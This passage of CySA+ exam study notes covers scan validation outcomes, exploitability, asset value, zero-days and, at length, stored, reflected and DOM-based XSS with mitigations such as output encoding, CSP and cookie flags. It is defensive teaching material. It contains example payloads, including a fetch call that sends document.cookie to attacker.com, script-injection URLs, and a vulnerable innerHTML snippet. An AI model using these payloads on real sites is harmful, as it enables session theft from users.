○ ✅ It exists and was detected.
● Example: A scanner detects a missing critical patch on a public-facing server — and it’s confirmed
to be real.

● False Positive (FP)
○ The tool reported a vulnerability that does not actually exist.
○ ❌ It was flagged incorrectly.

55
● Example: A scanner says a port is open to the public, but firewall rules prevent access — the report
is misleading.

● True Negative (TN)
○ There is no vulnerability, and the tool correctly did not raise an alert.
○ ✅ No issue, and nothing was flagged.
● Example: A properly configured server is scanned, and no alerts are triggered — as expected.

● False Negative (FN)
○ A vulnerability does exist, but the tool failed to detect it.
○ ❌ It was missed.
● Example: A legacy application has a known SQL injection flaw, but the scanner doesn’t flag it due to
weak detection signatures.

Why This Matters for Analysts
● False positives waste time and create alert fatigue
● False negatives are dangerous — they give a false sense of security
● True positives must be validated and prioritized for remediation
● True negatives help confirm baseline security posture

In CySA+ scenarios, you may be asked to evaluate scan output or SIEM alerts, and determine whether they
represent true threats or require investigation or dismissal.

Analyst Mindset for Validation
● Don’t assume the scanner is always right — tools are fallible
● Compare findings against asset inventory, firewall rules, system configuration
● Ask: Does this finding make sense for this system, this role, and this environment?
● Use tools like Nmap, Nessus, Wireshark, and log data to cross-check findings

56

Key Takeaway: The role of the analyst is to be the human filter between scanner noise and
real-world risk. Understanding the four validation outcomes — and being able to prove them —
is central to defending systems effectively.

Context Awareness
Definition
Context awareness is the ability to evaluate a vulnerability within the environment it exists in — factoring in
network location, exposure, asset role, and connectivity. It&#39;s not enough to know that a vulnerability exists;
you must understand:
● Where it is (internal, external, or isolated)
● How exposed it is
● What the potential impact would be

This context helps analysts distinguish between critical threats and low-priority issues, even if both have
high CVSS scores.

Internal
Definition:
The vulnerability exists on a system inside the organization’s internal network — typically behind firewalls
and not directly exposed to the internet.
Implications:
● Often less urgent unless it enables lateral movement or affects critical internal systems
● Still dangerous if combined with social engineering, phishing, or insider threats
● Should be monitored for access control flaws, privilege escalation, or weak segmentation

57

Example: A file server in the internal LAN is missing a patch for a remote code execution
vulnerability. It may not be internet-facing, but if an attacker gains a foothold, it becomes an
easy next step.

External
Definition:
The vulnerability is found on a public-facing system — such as a web server, VPN, mail server, or cloud
asset — that is reachable from the internet.
Implications:
● Highest priority for remediation, especially for remote code execution, data exposure, or
authentication bypass vulnerabilities
● Frequently targeted by automated scans, bots, and attackers
● Often the initial attack vector in breaches

Example: A web server on the DMZ has an unpatched SQL injection vulnerability. This poses
immediate risk and should be remediated as a priority.

Isolated
Definition:
The vulnerable system is logically or physically segmented from the main network — with restricted access,
air-gapping, or network segmentation in place.
Implications:
● Typically lower priority unless the vulnerability could bridge isolation (e.g., via removable media,
shared interfaces, or remote management)
● May still pose risk in regulated environments or industrial control systems (ICS)
● Requires evaluation of segmentation effectiveness and human access vectors

Example: A legacy industrial controller in a factory has known vulnerabilities but is air-gapped.
It may not be an immediate threat — unless removable USB drives or third-party maintenance
increase the exposure.

Analyst Mindset
● Don’t treat all vulnerabilities equally — location and exposure determine urgency

58

● Combine technical severity (CVSS) with contextual exposure for real prioritization
● Use asset tagging, network diagrams, and firewall rules to determine system role and connectivity
● When in doubt, ask:
○ “Is this system exposed to the internet?”
○ “Can this vulnerability be exploited remotely?”
○ “If exploited, how far could the attacker go from here?”

Key Takeaway: Vulnerability management must be context-aware. A critical vulnerability on an
external web server demands faster action than the same vulnerability on an isolated lab
machine. Exposure and location shape the true risk.

Exploitability / Weaponization
Definition
Exploitability refers to how easy or reliable it is to exploit a vulnerability in the real world.
Weaponization means that the vulnerability has been packaged into a functional exploit, script, or
automated attack tool — making it usable by attackers with little or no technical skill.
This concept helps analysts go beyond theoretical severity (like CVSS score) and assess actual likelihood of
exploitation.

Why Exploitability Matters
Two vulnerabilities with the same CVSS score may carry very different levels of real-world urgency:
● A complex memory corruption bug may be hard to exploit in practice — especially if it requires local
access.
● A publicly weaponized RCE (remote code execution) exploit may be actively used in ransomware
campaigns.

Key Point: A vulnerability is far more dangerous if an attacker can easily and reliably
weaponize it.

59

Key Factors in Exploitability
● Exploit Code Availability
○ Has working exploit code been published (e.g., on Exploit-DB, GitHub, Metasploit)?
○ If so, the vulnerability is already weaponized and ready to use.
● Integration into Tools
○ Is the exploit included in common frameworks like Metasploit, Cobalt Strike, Pacu, or
botnets?
○ This enables mass exploitation by unsophisticated attackers.
● Exploit Reliability
○ Does the exploit succeed consistently without crashing the target?
○ Is it considered “low complexity” in CVSS? If yes, it’s likely to succeed in real-world
conditions.
● Attacker Use in the Wild
○ Is the vulnerability being actively exploited (per CISA alerts, vendor bulletins, or threat intel
feeds)?
○ If so, it moves from theoretical to immediate threat.
● Exploit Chain Potential
○ Can the vulnerability be combined with others (e.g., local privilege escalation + remote
exploit) to achieve full system compromise?

Analyst Use Case: Prioritizing Based on Exploitability
● A CVSS 10.0 vulnerability with no public exploit code may not be the top immediate priority.
● A CVSS 8.1 vulnerability with a reliable Metasploit module might be far more urgent.

Analysts must ask:
● Has this been weaponized?
● Can attackers run this today with copy/paste ease?
● Is this being used in known campaigns?

60

Analyst Tools and Resources
● CISA Known Exploited Vulnerabilities Catalog (KEV)
● Exploit-DB and Rapid7 Metasploit module library
● MITRE ATT&amp;CK mappings (for known exploit behaviors)
● Threat intelligence feeds showing malware or APT groups using the exploit

Summary — Bullet Point Format
● Exploitability = How easy it is to exploit a vulnerability
● Weaponization = Whether working exploit code exists and is being used
● Key risk indicators:
○ Public PoC (proof-of-concept) code
○ Tool/framework integration
○ Active use in malware or APT campaigns
○ Reliable execution across targets
● Analyst Role:
○ Adjust risk based on exploitability, not just CVSS
○ Prioritize known weaponized exploits, even if scores are slightly lower
○ Use threat intel and exploit trackers to detect emerging risks

Key Takeaway: Exploitability transforms a vulnerability from a potential problem into an active
threat. When weaponized, even a moderate vulnerability can become mission-critical to
remediate.
Asset Value
Definition
Asset value refers to the relative importance of a system, application, or data set to the organization’s
mission, operations, or revenue. It plays a central role in determining how urgently a vulnerability should be
addressed.

61
Even if two systems have the same vulnerability, the one with greater business value should be prioritized
for protection and remediation.

Why Asset Value Matters in Vulnerability Management
Security isn’t about fixing every problem equally — it’s about protecting what matters most.
Asset value helps answer the question:
“If this system is compromised, how damaging would it be to the organization?”
By factoring in asset value, analysts and vulnerability managers can make risk-based decisions, not just
react to scan results.

Common High-Value Asset Types
● Domain controllers and identity systems – Control access across the enterprise
● Financial or ERP systems – Impact revenue, contracts, payroll
● Customer databases – Contain PII, PCI, or PHI — high regulatory impact
● Production web servers or APIs – Directly tied to business operations
● Industrial or critical infrastructure systems – Safety, compliance, and uptime-sensitive

How Asset Value Is Determined
● Data sensitivity (e.g., classified, HIPAA, PII)
● Business dependency (e.g., revenue generation, core functions)
● Regulatory exposure (e.g., subject to PCI DSS, SOX, GDPR)
● Service-level agreements (SLAs)
● Stakeholder impact (e.g., public reputation, legal liability)
● Recovery cost (e.g., system rebuilds, downtime losses)

Key Insight: Asset value isn’t just technical — it’s organizational. A vulnerability on a low-value
test server is not equal to the same vulnerability on a critical financial system.

62

Analyst Role in Asset-Based Prioritization
● Use asset inventory or CMDB (Configuration Management Database) to identify system roles and
value
● Combine asset criticality with vulnerability severity and exploitability
● Prioritize patching and remediation based on impact to the business, not just CVSS score
● Flag crown jewels for enhanced monitoring, isolation, or zero-trust protections

Summary — Bullet Point Format
● Asset value = How important a system is to business operations, data confidentiality, and
organizational resilience
● High-value assets include:
○ Authentication systems (e.g., Active Directory)
○ Customer or financial data repositories
○ Mission-critical applications
● Prioritize remediation for vulnerabilities on high-value assets, even if the CVSS score is moderate
● Use asset tags or categories (e.g., “Revenue system,” “PHI,” “Public API”) in scanning tools to
assist with risk-based decisions
● Combine asset value with exploitability to make informed, strategic remediation plans

Key Takeaway: Not all systems are equal. The same vulnerability becomes far more dangerous
when found on a high-value asset. True cybersecurity maturity means protecting what matters
most, not just what the scanner says is urgent.

Zero-Day Vulnerability
Definition
A zero-day vulnerability is a software flaw that is unknown to the vendor or publicly unpatched at the time it
is discovered or exploited. The term “zero-day” means there have been zero days to prepare or respond
before it is potentially used in an attack.

63

Zero-days are high risk because they are:
● Undocumented
● Not detectable by traditional tools
● Often actively exploited before anyone knows they exist

Why Zero-Days Matter
● They bypass signature-based detection tools (e.g., antivirus, IDS/IPS)
● There is usually no patch available at the time of discovery
● They are highly prized by attackers, especially advanced persistent threats (APTs)
● They may be used to gain initial access to a network or escalate privileges inside it

Key Point: A zero-day is not just a technical vulnerability — it represents a window of
opportunity for attackers and a crisis of visibility for defenders.

Analyst Considerations
● Detection is difficult — Look for behavioral anomalies, suspicious child processes, or lateral
movement patterns
● Threat intelligence is critical — Zero-days are often flagged in CISA KEV lists, vendor bulletins, or
APT reports
● Containment &gt; Patching — Since no patch exists, isolate affected systems, remove exposed
services, and monitor for indicators of compromise (IOCs)
● Patch quickly when released — Zero-day vulnerabilities are often weaponized fast once they are
public

Examples of Zero-Day Attacks
● Log4Shell (CVE-2021-44228) — A critical remote code execution flaw in the Log4j library, exploited
before public disclosure
● Stuxnet — Exploited multiple Windows zero-day vulnerabilities to attack Iranian industrial control
systems

64
● Microsoft Exchange Server (2021) — Zero-days used by threat actors to compromise email
infrastructure worldwide

Summary — Bullet Point Format
● Zero-day vulnerability = Unknown to the vendor at the time of exploitation; no patch yet exists
● Often detected only through behavior or external intelligence, not by scanner
● Requires containment, segmentation, and monitoring as primary response
● Commonly used by nation-state attackers, APT groups, and ransomware operators
● Patch as soon as released, and monitor vulnerable systems closely
● Track zero-day threats through:
○ CISA Known Exploited Vulnerabilities (KEV) Catalog
○ Vendor emergency bulletins (e.g., Microsoft, Cisco, VMware)
○ MITRE ATT&amp;CK for real-world attacker behavior

Key Takeaway: Zero-days represent the most dangerous type of vulnerability — not because of
their technical details, but because they catch defenders unprepared. Analysts must rely on
contextual awareness, detection heuristics, and threat intelligence to respond effectively.

Mitigation of Cross-Site Scripting
(XSS)
Web browsers are powerful platforms — capable of executing JavaScript, rendering dynamic HTML, storing
session cookies, and interacting with countless online services. But there is one foundational truth that
makes attacks like Cross-Site Scripting (XSS) possible:
The browser does not decide which content is safe. It trusts the server to decide that.
When a browser receives a response from a trusted server — like a news site, a banking portal, or a
corporate intranet — it assumes that content is legitimate and safe to display or execute. The browser does
not inspect or judge whether scripts should run or HTML should be shown. Instead:
● It executes scripts embedded in the page

65

● It displays content inserted into the DOM
● It accepts cookies, unless told not to
● It trusts the server to set the rules

This model works only if the server behaves correctly — by validating input, encoding output, restricting
script sources, and setting appropriate browser-enforced policies like CSP (Content Security Policy) and
cookie flags.
When a server fails to do those things — whether by reflecting user input, storing malicious content, or
embedding unsafe JavaScript — the browser will run attacker-controlled code with full trust, because it came
from a source the browser already believes in.
Cross-Site Scripting exists because the browser blindly trusts whatever the server delivers.
Understanding this trust relationship is the key to grasping all forms of XSS, their impact, and the layered
mitigations needed to prevent them. In the sections that follow, we break down:
● What each type of XSS looks like (Stored, Reflected, DOM-based)
● How the attack unfolds step by step
● What the attacker gains
● Which controls (server-side or browser-enforced) can block it

Only by understanding how browser trust and server responsibility interact can a cybersecurity analyst fully
defend against XSS.
2. What Does the Attacker Accomplish with XSS?
The attacker can:
● Steal session cookies (to impersonate the user)
● Log keystrokes
● Perform actions as the user (like changing settings or transferring funds)
● Redirect users to fake login pages
● Deliver malware or browser exploits

XSS is a user impersonation attack, not a password guessing attack. It exploits the trust
between the browser and the website.

66

3. Forms of XSS Attacks
3.1 Stored (Persistent) XSS
Definition:
The attacker stores malicious JavaScript in a website’s database (e.g., in a forum comment, user profile, or
blog post). When a user loads the page, the script is served with the page content and automatically
executed in the user’s browser.
Steps:
1. Attacker posts malicious code (e.g., a &lt;script&gt; tag) to a comment section.
2. The website saves this input without sanitizing it.
3. Later, a user visits the page and the script runs automatically in their browser.
4. The script (e.g., fetch(&quot;attacker.com?cookie=&quot; + document.cookie)) sends the user’s session cookie
to the attacker.
5. The attacker uses the cookie to log in as the victim.

Result:
The attacker hijacks the victim’s authenticated session without ever knowing their password.
Root Cause:
User input is stored and later rendered without proper output encoding.
Input sanitization is like checking the food before it goes into the oven.
Output encoding is like using oven mitts to handle hot food safely.
You need both — but output encoding is the one that actually stops the burn.

Input Sanitization

● When it happens: As data enters the system (user submits form)
● Purpose: Block or clean unwanted characters or patterns before storage
● Example: Rejects or strips out &lt;script&gt; from user input
● Effectiveness: Helps reduce risk but can be bypassed; not sufficient on its own

Output Encoding

67

● When it happens: As data is sent to the browser (output to webpage)
● Purpose: Ensure dangerous input is displayed as plain text, not interpreted as code
● Example: Converts &lt;script&gt; into &amp;lt;script&amp;gt; so it shows as text
● Effectiveness: Essential for preventing XSS; makes sure even dangerous-looking input is rendered
safely

3.2 Reflected XSS
Step 1: The Attacker Creates a Link
● The attacker does not visit the site and enter data like in stored XSS.
● Instead, they manually craft a link (a URL) that sends JavaScript as part of the request.

Example Link:
php-template
CopyEdit
https://example.com/search?q=&lt;script&gt;stealCookies()&lt;/script&gt;

This is a real link — it works just like any other clickable URL. But inside the q parameter, the attacker has
inserted a malicious script.
Note: This link is not yet on the website. It’s just a tool the attacker built.

Step 2: The Attacker Delivers the Link to a Victim
This is the step that usually confuses people — so let’s be exact.
How does the attacker get the link to someone?
● They might send it in a phishing email
● They might post it on social media

68

● They might put it in a forum post or a chat
● They might create a fake “login” button on another website that leads to it

The victim receives what looks like a normal link to a trusted site, like example.com, but it has
malicious code embedded in it.
So:
● The attacker never enters anything into the site
● The victim is the one who clicks the link
● The link contains the attack code

Step 3: The Victim Clicks the Link
Now the victim’s browser:
● Goes to example.com
● Sends the attacker’s malicious input to the server as part of the request
(e.g., q=&lt;script&gt;stealCookies()&lt;/script&gt;)

The web server receives that input and uses it to build the response page.
If the server reflects that input back into the page without encoding it, the page will say something like:
“You searched for: &lt;script&gt;stealCookies()&lt;/script&gt;”
The browser sees that and executes the script.

Step 4: The Victim’s Browser Runs the Script
Because the script is now part of the page:
html
CopyEdit
&lt;p&gt;You searched for: &lt;script&gt;stealCookies()&lt;/script&gt;&lt;/p&gt;

The browser thinks:

69

“Okay, this script must be safe. It came from the website I trust.”
It runs the attacker’s JavaScript.
This might:
● Send the victim’s session cookie to the attacker
● Redirect them to a phishing site
● Perform actions on the victim’s behalf

Step 5: The Attacker Uses What They Collected
Now the attacker uses the session cookie (or whatever the script stole) to:
● Log in as the victim
● Take actions without being detected
● Access private data

Summary of Key Concepts
● The attacker does not interact with the website directly.
● They build a link that contains JavaScript and send that link to someone else.
● The victim’s browser sends the input to the server, which reflects it into the page.
● The browser executes the code because it thinks it’s trusted.
● The attacker gets the result — usually a session cookie or some kind of access.

One-Sentence Mental Model
Reflected XSS is a one-shot trick: the attacker sends a weaponized link to a victim, and when
the victim clicks it, the site reflects the payload into the page, causing the browser to run it.

70

Reflected XSS – Concise 5-Step Summary
1. Attacker creates a malicious URL
○ The link includes JavaScript in a query string or form input.
2. Attacker sends the link to a victim
○ This could be through email, chat, or a public post.
3. Victim clicks the link
○ Their browser sends the malicious input to the server.
4. Server reflects the input in its response
○ The unfiltered script appears in the webpage output.
5. Victim’s browser runs the script
○ The attacker gains access (e.g., cookies, session, or browser actions).

Core Idea: The attacker never touches the site directly — the trick happens when the victim
interacts with a poisoned link, and the server reflects the poison back.

3.3 DOM-Based XSS
Step 1 – What Is the DOM?
DOM stands for Document Object Model.
It’s a structure the browser builds when it loads a web page.
Think of the DOM as the living version of the page in memory — a tree of HTML elements that
JavaScript can read and change.
When a webpage loads, the browser creates the DOM so that scripts can interact with the page. For example:
● A script can say: “Get the contents of this text box”
● Or: “Insert this message into the page”
● Or: “Read the URL and display it on the page”

This is client-side behavior — it all happens in the browser, not on the server.

71

So when we say:
“The vulnerability is caused entirely in the browser’s JavaScript, not the server,”
We mean:
● The attack takes place within the DOM.
● It’s the page’s own JavaScript, running in the browser, that causes the vulnerability.

Step 2 – The Key Difference From Other XSS
Forms
In reflected or stored XSS:
● The server echoes or stores the malicious input, and the browser runs it when the page is rendered.

In DOM-based XSS:
● The page’s own JavaScript reads untrusted input (like from the URL)
● Then it writes that untrusted data into the DOM without encoding
● The browser ends up executing attacker-controlled script — but the server never sees it

Step 3 – Who Are the Actors?
Let’s be precise:
● Attacker: Crafts a special link (just like in reflected XSS)
● Victim: Clicks the link and opens the page in their browser
● Server: Serves a normal, trusted web page — but that page has insecure JavaScript in it
● Vulnerability: The client-side JavaScript inside the page inserts attacker-controlled content into the
DOM without sanitizing it

Step 4 – Concrete, Step-by-Step Example

72

Let’s walk through a realistic example.
Website behavior (developer-intended):
A site example.com/greeting.html has code that shows a custom greeting:
javascript
CopyEdit
let name = window.location.hash.substring(1);
document.getElementById(&quot;greeting&quot;).innerHTML = &quot;Hello &quot; + name;
●
That means if the URL is:
bash
CopyEdit
https://example.com/greeting.html#Steve
● The page will display:

Hello Steve

Looks nice, right?

Now: The Attacker’s Move
The attacker sends the victim this URL:
php-template
CopyEdit
https://example.com/greeting.html#&lt;script&gt;stealCookies()&lt;/script&gt;

When the victim clicks the link:
1. Their browser loads the trusted page from the server (just like normal)
2. The page’s own JavaScript reads the part after # (the fragment)
○ That’s #&lt;script&gt;stealCookies()&lt;/script&gt;

It puts that directly into the page:

73

html
CopyEdit
Hello &lt;script&gt;stealCookies()&lt;/script&gt;
3.
4. The browser executes the script — because the script was injected into the DOM by the page’s own
code
5. The attacker steals the victim’s session cookie

No server involvement.
No server reflection.
Just a trusting browser running unsafe JavaScript from the page itself.

Step 5 – Why This Is Called DOM-Based XSS
● The JavaScript is run by the DOM, inside the browser
● The dangerous action comes from the page’s own JavaScript behavior
● No data is sent to or echoed by the server
● The input is parsed and executed entirely on the client side

Quick Summary in Plain English
● DOM-based XSS happens when a page’s own JavaScript reads untrusted input (like from the URL)
and writes it into the page without checking it
● The attacker sends a poisoned link
● The victim’s browser runs the script, even though the server never touched it
● The result is the same: session hijack, credential theft, malicious redirects

DOM-Based XSS – Concise 5-Step Summary
1. Attacker crafts a special URL
○ The URL includes malicious input (e.g., in the hash or query string).
1. Query String

74

● The query string is the part of a URL that comes after a ?
● It contains name-value pairs, usually used to pass data to the website

Example:
○ https://example.com/search?q=shoes

● ?q=shoes is the query string
● q is the parameter name
● shoes is the value

In DOM-based XSS, an attacker might place script code in the query string:
php-template
CopyEdit
○ https://example.com/search?q=&lt;script&gt;attack()&lt;/script&gt;

2. Hash (also called Fragment Identifier)
● The hash is the part of a URL that comes after a #
● It’s typically used to navigate within a page or store client-side data
● The server does not receive the hash — it is visible only to the browser and client-side JavaScript

Example:
○ https://example.com/page#section2

● #section2 is the hash
● JavaScript can read it using window.location.hash

In DOM-based XSS, an attacker can inject JavaScript through the hash:
○ https://example.com/page#&lt;script&gt;stealCookies()&lt;/script&gt;

75

The server never sees this, but if the page has JavaScript like:

○ document.getElementById(&quot;message&quot;).innerHTML = window.location.hash;

— then the script gets injected into the DOM, and runs in the victim&#39;s browser.

○
2. Victim clicks the link
○ The page loads normally from a trusted server.
3. Browser-side JavaScript reads the malicious input
○ The script reads the untrusted data from the URL or DOM.
4. Page inserts that input directly into the DOM
○ The page uses innerHTML or similar to display it without encoding.
5. Browser executes the injected script
○ The attacker’s code runs entirely in the victim’s browser — no server reflection involved.

Core Idea: In DOM-based XSS, the attacker poisons the input, but the vulnerability is in the
page’s own JavaScript, which mishandles that input and causes the browser to run the
attacker’s code.

Query String vs. Hash – Bullet Point Comparison
● Query String
○ Begins with a ? in the URL
○ Sent to both the server and browser
○ Commonly used to pass data to the server (e.g., ?search=shoes)
○ Can be read and used by JavaScript and server-side code
● Hash (Fragment Identifier)
○ Begins with a # in the URL

76

○ Visible only to the browser — not sent to the server
○ Used for in-page navigation or for client-side logic (e.g., #section3)
○ Often used in single-page apps and DOM-based attacks

4. Mitigation Strategies
4.1 Input Validation
● Accept only expected data types and lengths (e.g., no &lt; or &gt; in usernames)
● Use whitelisting — define what is allowed, not what is disallowed

Limit: Input validation alone does not stop XSS — it is just the first defense.

Parties Involved in an XSS Attack
● Attacker – Crafts and delivers malicious input (e.g., in a link or form)
● Victim – The person whose browser executes that malicious script
● Server – The trusted web application that unintentionally helps the attacker by mishandling data

Question: Who Implements the Mitigation?

77

You&#39;re asking: “Wait — if the victim is the one harmed, why is the server responsible for
preventing this?”
The answer is:
Yes — the server is responsible. And here’s why:
The server’s code (or the developer’s code) is what determines how user input is handled —
whether it’s filtered, sanitized, encoded, or dangerously inserted into the page.
So in almost all cases, XSS vulnerabilities exist because the server fails to protect the victim.
Even in DOM-based XSS, the vulnerable code is usually part of the web page that came from the server.

Why Is Input Validation a Server-Side Control?
Let’s revisit your observation:
“Input validation seems to be server-side. So is the server mitigating for the victim?”
Yes, exactly.
Here’s how it works:
● The server receives user input (from forms, URLs, etc.)
● The server should check:
○ “Is this input expected?”
○ “Is it too long?”
○ “Does it include dangerous characters like &lt;, &gt;, or &quot;?”
● If the input fails those checks, the server rejects or cleans it
● By doing that, the server is protecting the end user (victim) from receiving malicious output later

So yes:
The server is the gatekeeper.
The victim is the one being protected.
The attacker is trying to exploit the server’s weak defenses to reach the victim.

Let’s Make That Even Clearer in Bullet Point Format

78
● Input validation is performed by the server (or sometimes by client-side code, but the server is the
authoritative source)
● The purpose is to prevent bad input from ever being processed, stored, or reflected
● Victims are protected when the server refuses dangerous input
● The attacker is blocked before their payload can reach anyone’s browser

Key Insight
Input validation is like airport security:
The guards (server) check bags before letting them onto the plane (the webpage), so that
passengers (victims) don’t end up sitting next to a bomb (the script).

4.2 Output Encoding (Escaping)
4.2 Output Encoding (Escaping)
Definition:
Output encoding is the process of converting special characters in user-supplied data (such as &lt;, &gt;, &quot;, and &#39;)
into harmless, displayable equivalents before inserting that data into an HTML page. This prevents the
browser from interpreting the input as code.

Who Performs Output Encoding?
● The server (or more specifically, the developer who builds the web application) is responsible for
output encoding.
● It is applied before the data is sent to the browser and inserted into the page’s HTML.
● The goal is to protect the victim (user) from executing attacker-supplied scripts in their browser.

Why It Matters
If the server takes user-supplied input and inserts it into a web page without encoding, the browser may
interpret that input as real HTML or JavaScript code — and run it. That’s what enables cross-site scripting.

79
If the server encodes the input, the browser sees only harmless characters, and displays them as plain text.
Key insight: Encoding changes how the browser interprets the data — not what data is stored,
but how it is rendered.

Use Contextual Encoding
Different parts of a web page interpret special characters differently. The server must apply contextual
encoding based on where the user-supplied data is being inserted.
● HTML Body Content:
Escape &lt;, &gt;, &amp;, &quot; so that the browser does not treat them as tags
○ Example: &lt;script&gt; becomes &amp;lt;script&amp;gt;
● HTML Attributes:
Escape quotation marks and ampersands to prevent attribute injection
○ Example: &quot; onmouseover=&quot;alert(1) becomes &amp;quot; onmouseover=&amp;quot;alert(1)
● JavaScript Blocks:
Escape quotes and slashes to prevent code injection
○ Avoid inserting user data directly into scripts when possible
● URLs:
Use URL encoding (e.g., spaces become %20, &lt; becomes %3C) when inserting data into links

Example
● User Input:
&lt;script&gt;stealCookies()&lt;/script&gt;

Bad Output (No Encoding):
html
CopyEdit
&lt;p&gt;Welcome &lt;script&gt;stealCookies()&lt;/script&gt;&lt;/p&gt;
● → Browser runs the script

Safe Output (With Encoding):
html
CopyEdit
&lt;p&gt;Welcome &amp;lt;script&amp;gt;stealCookies()&amp;lt;/script&amp;gt;&lt;/p&gt;

80

● → Browser displays the input as text — nothing executes

Summary — Bullet Points
● Output encoding is performed by the server, not the user or browser
● It ensures that user-supplied input is displayed safely, not interpreted as code
● It is one of the most important defenses against reflected and stored XSS
● Must be applied based on context (HTML body, attribute, script, or URL)
● Encoding does not change the stored data, only how it is rendered by the browser

Key Takeaway: Encoding is what prevents the victim’s browser from running the attacker’s
script. It turns dangerous characters into plain symbols that can’t be executed — making it one
of the most powerful and reliable defenses against XSS.

4.3 Content Security Policy (CSP)
● A browser-enforced rule set that limits what scripts can run on a page
● Can block inline scripts, disallow external scripts from untrusted sources

Example header:
pgsql
CopyEdit
Content-Security-Policy: script-src &#39;self&#39;

Result:
Even if XSS slips through, the browser refuses to run the attacker’s script if it&#39;s not allowed by the CSP.
What Is It?
Content Security Policy (CSP) is a browser-enforced rule set that tells the browser:
“Only allow certain types of content (like scripts or images) from trusted sources.”

81
It’s like a firewall that lives inside the victim’s browser, protecting them after the page is delivered by the
server.

Key Point: Who Sets CSP?
● The server sends the CSP rules to the browser
● The victim’s browser enforces them
● The attacker’s script is what CSP tries to block

So yes — CSP is configured by the server but enforced by the victim’s browser.

Why Is This Important for XSS?
Even if:
● The server makes a mistake and includes a script tag injected by the attacker…

The browser says:
“That script doesn’t follow the CSP rules I was given — I’m not going to run it.”
This gives you defense-in-depth:
Even if input validation or encoding fails, CSP is a last line of defense on the victim’s side.

What Is an Inline Script?
An inline script is JavaScript that appears directly in the HTML page — not loaded from a file.
Example:
&lt;script&gt;alert(&#39;hello&#39;);&lt;/script&gt;
That’s inline — it’s embedded right inside the page.
CSP can be configured to block all inline scripts, so only approved external files can be used.

What Is an External Script?

82

An external script is a JavaScript file that the browser loads from some URL, like:
&lt;script src=&quot;https://cdn.example.com/script.js&quot;&gt;&lt;/script&gt;
This pulls the script from a remote server.
CSP can say:
“Only load scripts from this domain, and block everything else.”
So if an attacker tries to inject:
&lt;script src=&quot;http://evil.com/steal.js&quot;&gt;&lt;/script&gt;
The browser says:
“Nope — that’s not on the allowed list. I won’t load it.”

What Does script-src &#39;self&#39; Mean?
This is a CSP rule that says:
“Only allow scripts to run if they come from this exact domain — not from anywhere else.”
● &#39;self&#39; = the site that sent the CSP
● So if you&#39;re on example.com, only scripts from example.com will run
● All others — even from CDNs or other sites — are blocked

Where Is CSP Defined?
The server sends it in the HTTP response header, like this:
Content-Security-Policy: script-src &#39;self&#39;;
This means:
● Only scripts from this site can run
● No inline scripts
● No scripts from other websites

Step-by-Step Summary of How CSP Works in Practice

83

1. Server sends a web page AND a CSP policy
○ Example: “Only trust scripts from this domain”
2. Browser loads the page and reads the CSP rule
3. If the page tries to run any script, the browser checks:
○ Is this script allowed by the CSP?
4. If the script is not allowed, the browser:
○ Does not run it
○ Logs a violation to the console or CSP log (if enabled)

Real Impact
Even if an attacker finds an XSS vulnerability and injects:
&lt;script&gt;steal()&lt;/script&gt;
If the CSP says:
Content-Security-Policy: script-src &#39;self&#39;; // No inline scripts allowed
Then the browser blocks it.

Key Insight — Roles Summary
● Attacker: Tries to insert or load malicious scripts
● Server: Sends CSP rules to limit what scripts are allowed
● Victim’s browser: Enforces those rules and blocks anything that’s not trusted

4.4 Use Secure Frameworks
Who performs this?
→ Web developers (typically server-side) who write both the backend and frontend code of the application.

84

Goal:
Use development tools and techniques that prevent XSS vulnerabilities by default.
Who performs this?
Developers who build web applications — including both back-end (server-side) and front-end (client-side)
developers. They are responsible for writing the code that processes input, renders output, and manipulates
the page content the user sees. XSS vulnerabilities can be introduced in either layer, so secure development
practices must apply across both.

1. Use Secure Frameworks That Auto-Escape Output
● Modern frameworks like Django (Python), React, and Angular (JavaScript) automatically encode
user-supplied data before displaying it in HTML
● This prevents attackers from injecting scripts that the browser would otherwise execute
● Developers should rely on frameworks that escape dangerous characters, such as &lt;, &gt;, &quot;, and &#39;

2. Avoid Unsafe DOM Manipulation Methods
● When writing JavaScript that runs in the victim’s browser, developers should not use:
○ innerHTML
○ document.write()
○ String concatenation (e.g., &quot;Hello &quot; + userInput)
● These methods inject raw content into the page, and if the content is attacker-controlled, the
browser may execute it as code
● Safer alternatives include:
○ textContent
○ innerText
○ DOM API methods that do not interpret input as HTML

Summary – Bullet Points

85

● Use frameworks that auto-encode user input (React, Angular, Django)
● Developers should let the framework handle output rendering
● Avoid dangerous JavaScript methods like innerHTML that inject content directly into the DOM
● Even though the DOM lives in the victim’s browser, it is manipulated by code the developer wrote
● A secure framework can prevent many XSS issues automatically, reducing developer error

Key Takeaway: Developers are responsible for both server-side output and client-side code.
Secure frameworks reduce the chances of writing unsafe code that leads to XSS — both on the
server and in the browser.

4.5 HTTPOnly and Secure Cookies
Who performs this?
The server sets these flags when issuing cookies. The victim’s browser enforces the rules defined by these
flags.
Purpose:
Protect session cookies — which often store login state — from being accessed or stolen through XSS or
insecure transmission.

HTTPOnly Flag
● Prevents the browser from allowing JavaScript access to the cookie
● Blocks code like document.cookie from reading or exfiltrating sensitive cookies
● Mitigates XSS session hijacking
● Set by the server, enforced by the victim’s browser

Secure Flag
● Ensures the cookie is only sent over HTTPS, never HTTP
● Prevents session theft via unencrypted connections (e.g., man-in-the-middle attacks)
● Set by the server, enforced by the victim’s browser

86

Example Header Sent by Server:
Set-Cookie: sessionID=abc123; HttpOnly; Secure

This tells the browser:
“Keep this cookie private (no JavaScript access) and only send it when you&#39;re using HTTPS.”

Summary – Bullet Points
● Cookie flags are set by the server, but enforced in the victim’s browser
● HttpOnly prevents JavaScript (even malicious scripts) from reading the cookie
● Secure ensures cookies are never sent in plaintext
● Both flags help protect session cookies, which are a prime target for XSS attacks

Key Takeaway: These flags don’t stop XSS from happening — but they make it much harder for
an attacker to steal your session, even if XSS succeeds. They’re critical parts of a layered
defense.

4.6 Filter and Sanitize Stored Content
● Even if input is validated on entry, sanitize again on output
● Stored XSS often happens when websites reuse user data without re-checking it

The Browser Is Powerful — But It Trusts the
Server to Set the Rules
Let’s put it in plain terms:
● The browser is built to follow instructions, not to make security decisions on its own.
● It can enforce policies, but only after the server tells it what those policies are.

87

● That includes:
○ Whether cookies are HttpOnly
○ Whether scripts from outside domains are allowed (CSP)
○ Even how cross-origin requests are handled (CORS)

Why This Seems Backward — But Isn’t
It feels strange because you’re thinking exactly like a security expert:
“Why doesn’t the browser just protect itself?”
But browsers aren’t just protecting the user — they’re also trying to render websites as intended by
developers. They’re built for compatibility first, not for defensive isolation by default.
So the model is:
The server defines the security rules,
and the browser enforces those rules — as long as they’re present.
No rule? No protection.

This Is Why XSS Is So Dangerous
